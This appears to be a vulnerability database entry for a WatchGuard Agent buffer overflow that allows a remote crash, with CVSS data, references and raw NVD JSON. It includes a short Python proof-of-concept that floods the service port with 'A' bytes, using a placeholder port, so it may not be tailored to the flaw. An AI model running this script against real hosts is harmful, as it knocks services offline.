CVE-2026-41287

Description

Stack-based Buffer Overflow vulnerability in the WatchGuard Agent discovery service on Windows allows Overflow Buffers. An unauthenticated attacker on the same local network could exploit this vulnerability to crash the agent service.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:watchguard:agent:*:*:*:*:*:windows:*:* - VULNERABLE

WatchGuard Agent (Windows)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# Target configuration
target_ip = "192.168.1.10"  # Replace with the target IP
target_port = 4115          # Replace with the actual discovery service port

# Exploit payload generation
# The vulnerability is a stack-based buffer overflow.
# We send a large buffer to crash the service.
buffer_size = 2000
payload = b"A" * buffer_size

try:
    # Create a socket object
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Set a timeout
    s.settimeout(5)

    print(f"[+] Connecting to {target_ip}:{target_port}...")
    s.connect((target_ip, target_port))

    print("[+] Sending malicious payload...")
    s.send(payload)

    print("[+] Payload sent. Check if the service crashed.")
    s.close()

except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41287
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41287
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41287/
[4] VulDB https://vuldb.com/cve/CVE-2026-41287
[5] https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2026-00010

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41287", "sourceIdentifier": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "published": "2026-05-06T15:16:10.767", "lastModified": "2026-05-11T18:36:54.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stack-based Buffer Overflow vulnerability in the WatchGuard Agent discovery service on Windows allows Overflow Buffers. An unauthenticated attacker on the same local network could exploit this vulnerability to crash the agent service."}], "metrics": {"cvssMetricV40": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:watchguard:agent:*:*:*:*:*:windows:*:*", "versionEndExcluding": "1.25.03.0000", "matchCriteriaId": "1D391721-7499-4701-A84D-C58CD093CCB0"}]}]}], "references": [{"url": "https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2026-00010", "source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "tags": ["Vendor Advisory"]}]}}